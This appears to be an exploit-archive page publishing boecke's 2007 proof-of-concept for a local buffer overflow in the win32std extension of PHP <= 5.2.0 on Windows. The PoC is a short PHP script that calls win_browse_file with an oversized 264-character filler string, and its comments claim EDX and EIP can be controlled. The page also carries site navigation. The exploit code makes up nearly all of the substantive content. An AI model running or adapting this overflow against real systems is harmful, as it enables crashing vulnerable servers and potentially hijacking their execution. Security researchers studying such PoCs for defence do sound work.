PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32)
# Published : 2007-08-18
# Author : boecke
# Previous Title : Cisco IP Phone 7940 (10 SIP messages) Remote Denial of Service Exploit
# Next Title : Mercury SMTPD Remote Preauth Stack Based Overrun PoC

<?php
// ==================================================================================
//
//        php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow
//
//		[x] Discovery: boecke <boecke@herzeleid.net>
//		[x] Risk: Local Buffer Overflow (Medium - High Risk)
//		[x] Notes: EDX and EIP are able to be controlled and therefore
//			     have the potential to dictate program flow.
//
//		[x] "Sangre, sonando, de rabia naci.. Who do you trust?"
//
// ==================================================================================

if ( !extension_loaded("win32std") )
{
	die;
}

win_browse_file( 1, NULL, str_repeat( "x90", 264 ), NULL, array( "*" => "*.*" ) );

?>

# www.Syue.com [2007-08-18]